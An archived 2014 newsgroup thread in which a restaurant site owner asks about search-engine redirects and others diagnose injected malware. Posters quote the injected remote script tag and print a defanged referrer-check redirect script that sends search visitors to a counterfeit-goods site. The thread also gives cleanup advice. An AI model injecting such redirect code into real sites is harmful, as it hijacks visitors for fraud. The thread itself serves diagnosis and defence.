Google search redirects to another site - website help requested

Do you have a question? Post it now! No Registration Necessary.  Now with pictures!

Threaded View
Hi all,

I currently have a website www.thegreatwall.ca which works fine if you access it directly.  However, when you actually search it on google and follow the search result, it redirects to a different site.

I have checked the source code on all of the pages, and everything seems fine.  I cannot find the problem in there.

When I run a Redleg File viewer on the site, i get a suspcious line which says:

1:  < script src="hxxp://cancher.iamsanver.com/a/cancher.js" type="text/javascript"> < / script >  

Note: The script call above looks suspicious! Check to make sure it is legit.  

The problem is that i cannot find it.  Any help on how I can resolve would be greatly appreciated.

Thanks!

Re: Google search redirects to another site - website help requested

On Sat, 04 Oct 2014 20:43:34 -0700, will.c.wong wrote:

Quoted text here. Click to load it

Check your site using the free tool on Sucuri.net. This shows you are  
indeed infected with malware. The report sitecheck.sucuri.net/results/
thegreatwall.ca  shows the following:-

Anomaly behavior detected (possible malware). Details: http://sucuri.net/
malware/malware-entry-mwanomalysp8
<script src="http://cancher.iamsanver.com/a/cancher.js " type="text/
javascript"></script>

Good luck.

Thane

Re: Google search redirects to another site - website help requested

Hi Thane,
Thanks - but how would i go about resolving this?  I can't seem to find the said script in my source code.

On Sunday, October 5, 2014 12:06:44 AM UTC-4, Thane wrote:
Quoted text here. Click to load it


Re: Google search redirects to another site - website help requested

will.c.wong@gmail.com submitted this idea :
Quoted text here. Click to load it

The call to the script is there before (above) your HTML container.



Re: Google search redirects to another site - website help requested

On Sun, 05 Oct 2014 08:37:56 -0400, FromTheRafters wrote:


Quoted text here. Click to load it

To the original poster, if you use the Sucuri tool, it lists multiple  
problems. I'd recommend just asking them to fix it and pay what seems  
like a small amount. If the hackers got in once, it'll happen again.  
Anyway, it's your choice.

Thane

Google search redirects to another site - website help

+ User FidoNet address: 1:3634/12
 On Sat, 04 Oct 2014, Thane wrote to All:


 T> On Sun, 05 Oct 2014 08:37:56 -0400, FromTheRafters wrote:
Quoted text here. Click to load it

 T> To the original poster, if you use the Sucuri tool, it lists
 T> multiple  problems.

+1

 T> I'd recommend just asking them to fix it and pay what seems like a  
 T> small amount.

asking who? sucuri? why would anyone in their right mind allow some external
3rd party access to their internals? we're extremely hardpressed to allow such
even with NDAs and other leagal documents related to how our operations work...
it takes a lot to allow someone else into our systems...

 T> If the hackers got in once, it'll happen again.

it /might/ and that depends on the admin and the software being exposed to the
outside world...

 T> Anyway, it's your choice.

+1

)\/(ark
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ The FidoNet News Gate (Huntsville, AL - USA)        +
+ The views of this user are strictly his or her own. +
+ All data is scanned for malware by Avast! Antivirus +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

---
This email is free from viruses and malware because avast! Antivirus protection is active.
http://www.avast.com


Re: Google search redirects to another site - website help

On Sun, 05 Oct 2014 20:59:13 +0000, mark lewis wrote:


I haven't used, and therefore can't vouch for Sucuri, but it's a legit  
multi-national company based in California and one of the few which  
understands the WordPress issues many of the compromised sites are  
experiencing.  

This original poster in this thread is on M$ IIS/7.0 and the Sucuri  
webtool identified multiple issues with the infection, so that gave me a  
positive impression to start with. I've used this free tool to examine  
many compromised sites which have been infiltrated by spammers. Most are  
WordPress, but not all. Additionally, I have a few contacts who have used  
this company and they claim positive results.  

In the absence of a dedicated IT staff, companies are faced with how to  
maintain a clean web presence. So my take (yes it's a personal one), in  
the absence of staff who know what they are doing, then outsourcing the  
security to a company who does understand it, makes total sense. They  
(Sucuri) publish an $90 per year charge for a website, which sounds to me  
extremely cost effective. In the end, it's not my money or decision, but  
it's an option.

It's worthwhile to check thegreatwall dot ca on Sucuri and you'll see the  
detail this free tool offers. If you understand how to fix your own  
sites, and can monitor and maintain them, great. Otherwise, if it were  
me, I'd outsource this to someone who understands it.

Peace.

Thane


Re: Google search redirects to another site - website help

"Thane"  wrote in message  
Quoted text here. Click to load it

Avast  hit on several posts in this thread with a High threat level and also  
HTML:Script-inf . This was with the Avast def from yesterday and the new  
defs this am.
Just for your info. This last post was clean.
Neither VirusTotal, MBAM or SAS found any problems.
--  
Buffalo  


Re: Google search redirects to another site - website help

"Buffalo" wrote:

Quoted text here. Click to load it

WTF? That just shows how crap Avast is if it's detecting threats in
plain-text news messages.

Quoted text here. Click to load it

Of course it is - as are all posts in the thread.

Quoted text here. Click to load it

I should hope not!



Re: Google search redirects to another site - website help

"Ant"  wrote in message  
Quoted text here. Click to load it
No anti-virus is perfect.
I am still a believer of Avast.
Still curious on what it hit on.
--  
Buffalo  


Re: Google search redirects to another site - website help

"Buffalo" wrote:

Quoted text here. Click to load it

It's obviously not suitable for checking newsgroup messages.
And why would you do that anyway? You should be reading in whatever
"safe mode" your newsreader provides. In other words read plain text
only - don't render html messages or automatically display attachments
(there aren't any here anyway). That way, there's no risk whatsoever.

Quoted text here. Click to load it

Well, read the messages. It must have been the text of the html and
script that was posted by Rafters and probably html snippets posted
by others that showed a script source URL. No danger at all in plain
text posts and even if they had been active in html posts and you
were rendering them, your newsreader should not be fetching remote
content from embedded links.



Google search redirects to another site - website help

+ User FidoNet address: 1:3634/12.71
On Wed, 08 Oct 2014, Buffalo wrote to All:

 B> Avast  hit on several posts in this thread with a High threat level
 B> and also  HTML:Script-inf .

that's understandable since the code with the link was posted a couple of
times...

)\/(ark

If you think it's expensive to hire a professional to do the job, wait until
you hire an amateur.
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ The FidoNet News Gate (Huntsville, AL - USA)        +
+ The views of this user are strictly his or her own. +
+ All data is scanned for malware by Avast! Antivirus +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

---
This email is free from viruses and malware because avast! Antivirus protection is active.
http://www.avast.com


Google search redirects to another site - website help requested

+ User FidoNet address: 1:3634/12
 On Sat, 04 Oct 2014, will.c.wong@gmail.com wrote to All:

 wg> From: will.c.wong@gmail.com

 wg> Hi Thane,
 wg> Thanks - but how would i go about resolving this?  I can't seem to
 wg> find the said script in my source code.

of course you won't find the script on your site... it is hosted on the
referenced site...  

if the line is hardcoded into your pages, deleting that line from all the  
pages that contain it should resolve the problem...

you need to figure out how they were able to inject that line into your
pages... they might have found a hole in your scripts and injected it into an
sql database if you use one... if that's how they are getting the line into
your pages, then you need to find it in the sql database and clean it up from
there as well as figuring out where the hole is and stopping it up...

if you are using a CMS (eg: wordpress or similar), then you need to ensure that
you are updated to the latest version of it... it is likely the maintainers
have already fixed the holes... if you are running a CMS and using 3rd party
plugins, you need to ensure that they are also updated...

you should also check all your site's directories for unknown scripts which may
have been placed through the hole and which would give them access right back
into your site...

)\/(ark
+++++++++++++++++++++++++++++++++++++++++++++++++++++++
+ The FidoNet News Gate (Huntsville, AL - USA)        +
+ The views of this user are strictly his or her own. +
+ All data is scanned for malware by Avast! Antivirus +
+++++++++++++++++++++++++++++++++++++++++++++++++++++++

---
This email is free from viruses and malware because avast! Antivirus protection is active.
http://www.avast.com


Re: Google search redirects to another site - website help requested

My site is actually a very simple set of HTML pages, so there really isn't too many places to hide - more curious how they are doing what they are doing.

Has anyone used the Malware tool by GoDaddy?  Thoughts on whether it would remove my issue?  I don't mind spending the money, i just want to ensure it resolves my challenge.

Re: Google search redirects to another site - website help requested

will.c.wong@gmail.com formulated on Monday :
Quoted text here. Click to load it

It is likely not on your (local) copy of the HTML which you put on the  
page, it is 'outside' of your HTML container. Like this:

<script src="hxxp://cancher.iamsanver.com/a/cancher.js"  
type="text/javascript"></script>
<HTML>
  <HEAD>
    <TITLE>The Great Wall Restaurant. Halifax, NS, Canada.  
(902)422-6153.</TITLE>
    <meta name="keywords" content="The Great Wall Halifax Nova Scotia  
Chinese Food">
    <meta name="description" content="Chinese Food Halifax Nova Scotia  
The Great Wall">
    <STYLE>
        A {text-decoration: none;}

    </STYLE>

  </HEAD>

  <BODY bgcolor="#000000" link="#000000" vlink="#000000"  
alink="#000000">

[snipped]

It goes to this [defanged] script:

var s = document.referrer;
if (s.indexOf("google") > 0 || s.indexOf("bing") > 0 ||  
s.indexOf("yahoo") > 0 || s.indexOf("aol") > 0) {
    self.location = 'hxxp://wŵw.bagonstyle.com/'
}



Re: Google search redirects to another site - website help requested

<will.c.wong> wrote:

Quoted text here. Click to load it

Others have described what to do about your compromised server, so
I'll just have a quick laugh at the name of your host:

thegreatwall.ca -> 33.27.168.184
33.27.168.184   -> p3nw8shg326.shr.prod.phx3.secureserver.net.

(so much for secure) and explain the technicalities of what's going on.

The instruction to load a script has been injected into the top of
your web page. The script checks the referrer header in the browser
and if it contains "google", "bing", "yahoo" or "aol" you are
redirected to www .bagonstyle .com which looks like a site selling
fake designer handbags. If you haven't navigated via one of those
search providers your page loads normally. This is why you can go
there directly.

Incidently, you may get more help if you post to a group about web
hosting or web mastering.



Re: Google search redirects to another site - website help requested


Quoted text here. Click to load it

Ant great find! It seems to be his web page creator that's to blame. I  
wonder if Bagonstyle infected it with some malware to redirect traffic  
to their site.

--  
Jax        

Site Timeline